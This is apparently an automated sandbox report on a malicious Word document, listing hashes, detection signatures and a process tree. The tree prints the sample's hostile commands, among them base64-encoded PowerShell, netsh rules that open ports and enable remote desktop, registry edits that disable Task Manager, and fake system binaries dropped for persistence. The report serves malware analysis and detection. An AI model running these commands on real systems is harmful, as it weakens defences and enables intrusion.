c5a73a3499d0208c50a3459a4231a561ca6afdef6b55cf66a151a1322c3294ce

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
13-03-2023 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c5a73a3499d0208c50a3459a4231a561ca6afdef6b55cf66a151a1322c3294ce.doc
Size

223KB
MD5

88e8ebfd7f92d24f5a9d0d780c4ae8f7
SHA1

8f7a3a9823bf3f8177b98578f249015177dc570e
SHA256

c5a73a3499d0208c50a3459a4231a561ca6afdef6b55cf66a151a1322c3294ce
SHA512

3b1ad7947caffd2479d60cf740c890d6a5fe16c661fa476e2c36dd66b087ae7a52241a20f9bcb3464b796c0f2a92f635e4cc0992e2d87c3b6b957e013ddf93d7
SSDEEP

6144:P9+Z/K6tPrJ+dVK1isYnMGz+5SVWU+rAYIWEfp9ewCj7nsM6RO9:1+Z/K6J5eMi+AXQvwPewCj7n7kO

Score

8^/10

evasion upx

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

Processes:

cmd.exe

flow pid process

90 4860 cmd.exe
91 4860 cmd.exe
95 4860 cmd.exe
96 4860 cmd.exe
98 4860 cmd.exe
99 4860 cmd.exe

flow	pid	process
90	4860	cmd.exe
91	4860	cmd.exe
95	4860	cmd.exe
96	4860	cmd.exe
98	4860	cmd.exe
99	4860	cmd.exe

Disables RegEdit via registry modification 2 IoCs

evasion

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs 4 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

4508 netsh.exe
3856 netsh.exe
4156 netsh.exe
4616 netsh.exe

pid	process
4508	netsh.exe
3856	netsh.exe
4156	netsh.exe
4616	netsh.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exeCcEFiCMXAliVh.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	CcEFiCMXAliVh.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.cmd	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.cmd	cmd.exe

Executes dropped EXE 1 IoCs

Processes:

CcEFiCMXAliVh.exe

pid process

3672 CcEFiCMXAliVh.exe

pid	process
3672	CcEFiCMXAliVh.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\CcEFiCMXAliVh.exe	upx
C:\Users\Admin\CcEFiCMXAliVh.exe	upx
behavioral2/memory/3672-162-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/3672-171-0x0000000000400000-0x0000000000491000-memory.dmp	upx

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

165 ifconfig.me

flow	ioc
165	ifconfig.me

Drops file in System32 directory 22 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\dwn.exe	cmd.exe
File created	C:\Windows\SysWOW64\csrss.exe	cmd.exe
File created	C:\Windows\SysWOW64\smartscreen.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\smartscreen.exe	cmd.exe
File created	C:\Windows\SysWOW64\svchost.exe	cmd.exe
File created	C:\Windows\SysWOW64\SgrmBroker.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\securekernel.exe	cmd.exe
File created	C:\Windows\SysWOW64\winlogon.exe	cmd.exe
File created	C:\Windows\SysWOW64\smss.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\csrss.exe	cmd.exe
File created	C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	cmd.exe
File created	C:\Windows\SysWOW64\wininit.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wininit.exe	cmd.exe
File created	C:\Windows\SysWOW64\securekernel.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\smss.exe	cmd.exe
File created	C:\Windows\SysWOW64\dwn.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\svchost.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\winlogon.exe	cmd.exe
File created	C:\Windows\SysWOW64\lsass.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\lsass.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\SgrmBroker.exe	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4152 timeout.exe
2356 timeout.exe
1500 timeout.exe
3788 timeout.exe
804 timeout.exe
432 timeout.exe
2384 timeout.exe
4152 timeout.exe
480 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1784 tasklist.exe

pid	process
4152	timeout.exe
2356	timeout.exe
1500	timeout.exe
3788	timeout.exe
804	timeout.exe
432	timeout.exe
2384	timeout.exe
4152	timeout.exe
480	timeout.exe

pid	process
1784	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXEipconfig.exe

pid process

1124 NETSTAT.EXE
1916 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4988 systeminfo.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe
Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

4564 reg.exe
1720 reg.exe
1320 reg.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4884 WINWORD.EXE
4884 WINWORD.EXE

pid	process
1124	NETSTAT.EXE
1916	ipconfig.exe

pid	process
4988	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	cmd.exe

pid	process
4564	reg.exe
1720	reg.exe
1320	reg.exe

pid	process
4884	WINWORD.EXE
4884	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

cmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2016	cmd.exe
2016	cmd.exe
2016	cmd.exe
2384	powershell.exe
2384	powershell.exe
2384	powershell.exe
3900	powershell.exe
3900	powershell.exe
3900	powershell.exe
2796	powershell.exe
2796	powershell.exe
2796	powershell.exe
1396	powershell.exe
1396	powershell.exe
1396	powershell.exe
2384	powershell.exe
2384	powershell.exe
2384	powershell.exe
2508	powershell.exe
2508	powershell.exe
2508	powershell.exe
5040	powershell.exe
5040	powershell.exe
5040	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	cmd.exe
2100	powershell.exe
2100	powershell.exe
2100	powershell.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
480	cmd.exe
480	cmd.exe
480	cmd.exe
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
2152	powershell.exe
2152	powershell.exe
2152	powershell.exe
1228	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

cmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.execmd.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2016	cmd.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeDebugPrivilege	480	cmd.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	1252	cmd.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	4852	cmd.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	3720	cmd.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	3176	cmd.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	1660	cmd.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	4408	cmd.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	4764	cmd.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXE

pid process

4884 WINWORD.EXE
4884 WINWORD.EXE
4884 WINWORD.EXE
4884 WINWORD.EXE
4884 WINWORD.EXE
4884 WINWORD.EXE
4884 WINWORD.EXE
4884 WINWORD.EXE

pid	process
4884	WINWORD.EXE
4884	WINWORD.EXE
4884	WINWORD.EXE
4884	WINWORD.EXE
4884	WINWORD.EXE
4884	WINWORD.EXE
4884	WINWORD.EXE
4884	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXECcEFiCMXAliVh.execmd.exeWScript.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4884 wrote to memory of 3672	4884	WINWORD.EXE	CcEFiCMXAliVh.exe
PID 4884 wrote to memory of 3672	4884	WINWORD.EXE	CcEFiCMXAliVh.exe
PID 4884 wrote to memory of 3672	4884	WINWORD.EXE	CcEFiCMXAliVh.exe
PID 3672 wrote to memory of 1504	3672	CcEFiCMXAliVh.exe	cmd.exe
PID 3672 wrote to memory of 1504	3672	CcEFiCMXAliVh.exe	cmd.exe
PID 3672 wrote to memory of 1504	3672	CcEFiCMXAliVh.exe	cmd.exe
PID 1504 wrote to memory of 4904	1504	cmd.exe	mode.com
PID 1504 wrote to memory of 4904	1504	cmd.exe	mode.com
PID 1504 wrote to memory of 4904	1504	cmd.exe	mode.com
PID 1504 wrote to memory of 4252	1504	cmd.exe	certutil.exe
PID 1504 wrote to memory of 4252	1504	cmd.exe	certutil.exe
PID 1504 wrote to memory of 4252	1504	cmd.exe	certutil.exe
PID 1504 wrote to memory of 4916	1504	cmd.exe	WScript.exe
PID 1504 wrote to memory of 4916	1504	cmd.exe	WScript.exe
PID 1504 wrote to memory of 4916	1504	cmd.exe	WScript.exe
PID 4916 wrote to memory of 4744	4916	WScript.exe	cmd.exe
PID 4916 wrote to memory of 4744	4916	WScript.exe	cmd.exe
PID 4916 wrote to memory of 4744	4916	WScript.exe	cmd.exe
PID 4744 wrote to memory of 1416	4744	cmd.exe	cmd.exe
PID 4744 wrote to memory of 1416	4744	cmd.exe	cmd.exe
PID 4744 wrote to memory of 1416	4744	cmd.exe	cmd.exe
PID 1416 wrote to memory of 3100	1416	cmd.exe	chcp.com
PID 1416 wrote to memory of 3100	1416	cmd.exe	chcp.com
PID 1416 wrote to memory of 3100	1416	cmd.exe	chcp.com
PID 4744 wrote to memory of 2808	4744	cmd.exe	chcp.com
PID 4744 wrote to memory of 2808	4744	cmd.exe	chcp.com
PID 4744 wrote to memory of 2808	4744	cmd.exe	chcp.com
PID 4744 wrote to memory of 3712	4744	cmd.exe	cmd.exe
PID 4744 wrote to memory of 3712	4744	cmd.exe	cmd.exe
PID 4744 wrote to memory of 3712	4744	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1632	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1632	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1632	3712	cmd.exe	cmd.exe
PID 1632 wrote to memory of 2016	1632	cmd.exe	cmd.exe
PID 1632 wrote to memory of 2016	1632	cmd.exe	cmd.exe
PID 1632 wrote to memory of 2016	1632	cmd.exe	cmd.exe
PID 3712 wrote to memory of 4508	3712	cmd.exe	netsh.exe
PID 3712 wrote to memory of 4508	3712	cmd.exe	netsh.exe
PID 3712 wrote to memory of 4508	3712	cmd.exe	netsh.exe
PID 3712 wrote to memory of 1760	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1760	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1760	3712	cmd.exe	cmd.exe
PID 1760 wrote to memory of 2384	1760	cmd.exe	powershell.exe
PID 1760 wrote to memory of 2384	1760	cmd.exe	powershell.exe
PID 1760 wrote to memory of 2384	1760	cmd.exe	powershell.exe
PID 3712 wrote to memory of 3856	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 3856	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 3856	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 912	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 912	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 912	3712	cmd.exe	cmd.exe
PID 912 wrote to memory of 3900	912	cmd.exe	powershell.exe
PID 912 wrote to memory of 3900	912	cmd.exe	powershell.exe
PID 912 wrote to memory of 3900	912	cmd.exe	powershell.exe
PID 3712 wrote to memory of 4156	3712	cmd.exe	netsh.exe
PID 3712 wrote to memory of 4156	3712	cmd.exe	netsh.exe
PID 3712 wrote to memory of 4156	3712	cmd.exe	netsh.exe
PID 3712 wrote to memory of 1896	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1896	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1896	3712	cmd.exe	cmd.exe
PID 1896 wrote to memory of 2796	1896	cmd.exe	powershell.exe
PID 1896 wrote to memory of 2796	1896	cmd.exe	powershell.exe
PID 1896 wrote to memory of 2796	1896	cmd.exe	powershell.exe
PID 3712 wrote to memory of 4616	3712	cmd.exe	netsh.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c5a73a3499d0208c50a3459a4231a561ca6afdef6b55cf66a151a1322c3294ce.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4884

C:\Users\Admin\CcEFiCMXAliVh.exe
C:\Users\Admin\CcEFiCMXAliVh.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A07B.tmp\01010.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\mode.com
Mode 60,3
4⤵
PID:4904

C:\Windows\SysWOW64\certutil.exe
CERTUTIL -f -decode "C:\Users\Admin\AppData\Local\Temp\A07B.tmp\01010.bat" "C:\Users\Admin\AppData\Local\Temp\svc.bat"
4⤵
PID:4252

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vbs.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svc.bat" x"
5⤵
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c chcp
6⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\SysWOW64\chcp.com
chcp
7⤵
PID:3100

C:\Windows\SysWOW64\chcp.com
chcp 708
6⤵
PID:2808

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\svc.bat" x"
6⤵
- Drops startup file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0nQkMnIGRpcj1pbiBhY3Rpb249YWxsb3cgcHJvdG9jb2w9VENQIGxvY2FscG9ydD01MTUwMA=="""))
7⤵
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0nQkMnIGRpcj1pbiBhY3Rpb249YWxsb3cgcHJvdG9jb2w9VENQIGxvY2FscG9ydD01MTUwMA=="""))
8⤵
PID:2016

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name='BC' dir=in action=allow protocol=TCP localport=51500
7⤵
- Modifies Windows Firewall
PID:4508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0nRlRkJyBkaXI9b3V0IGFjdGlvbj1hbGxvdyBwcm90b2NvbD1UQ1AgbG9jYWxwb3J0PTIw"""))
7⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0nRlRkJyBkaXI9b3V0IGFjdGlvbj1hbGxvdyBwcm90b2NvbD1UQ1AgbG9jYWxwb3J0PTIw"""))
8⤵
PID:2384

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name='FTd' dir=out action=allow protocol=TCP localport=20
7⤵
- Modifies Windows Firewall
PID:3856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0nRlRjJyBkaXI9b3V0IGFjdGlvbj1hbGxvdyBwcm90b2NvbD1UQ1AgbG9jYWxwb3J0PTIx"""))
7⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0nRlRjJyBkaXI9b3V0IGFjdGlvbj1hbGxvdyBwcm90b2NvbD1UQ1AgbG9jYWxwb3J0PTIx"""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgc2V0IHJ1bGUgZ3JvdXA9InJlbW90ZSBkZXNrdG9wIiBuZXcgZW5hYmxlPXllcw=="""))
7⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""bmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgc2V0IHJ1bGUgZ3JvdXA9InJlbW90ZSBkZXNrdG9wIiBuZXcgZW5hYmxlPXllcw=="""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name='FTc' dir=out action=allow protocol=TCP localport=21
7⤵
- Modifies Windows Firewall
PID:4156

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
7⤵
- Modifies Windows Firewall
PID:4616

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
7⤵
- Delays execution with timeout.exe
PID:2356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0NVXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSAvdiAiRGlzYWJsZVJlZ2lzdHJ5VG9vbHMiIC90IFJFR19EV09SRCAvZCAiMCIgL2Y="""))
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0NVXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSAvdiAiRGlzYWJsZVJlZ2lzdHJ5VG9vbHMiIC90IFJFR19EV09SRCAvZCAiMCIgL2Y="""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableRegistryTools" /t REG_DWORD /d "0" /f
7⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:4564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0NVXFNvZnR3YXJlXFBvbGljaWVzXE1pY3Jvc29mdFxXaW5kb3dzXFN5c3RlbSAvdiAiRGlzYWJsZUNNRCIgL3QgUkVHX0RXT1JEIC9kICIwIiAvZg=="""))
7⤵
PID:2200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0NVXFNvZnR3YXJlXFBvbGljaWVzXE1pY3Jvc29mdFxXaW5kb3dzXFN5c3RlbSAvdiAiRGlzYWJsZUNNRCIgL3QgUkVHX0RXT1JEIC9kICIwIiAvZg=="""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Policies\Microsoft\Windows\System /v "DisableCMD" /t REG_DWORD /d "0" /f
7⤵
- Modifies registry key
PID:1720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0VZX0NVUlJFTlRfVVNFUlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0gL3YgIkRpc2FibGVUYXNrTWdyIiAvdCBSRUdfRFdPUkQgL2QgIjEiIC9m"""))
7⤵
PID:4268

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0VZX0NVUlJFTlRfVVNFUlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0gL3YgIkRpc2FibGVUYXNrTWdyIiAvdCBSRUdfRFdPUkQgL2QgIjEiIC9m"""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\SysWOW64\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
7⤵
PID:4348

C:\Windows\SysWOW64\cmd.exe
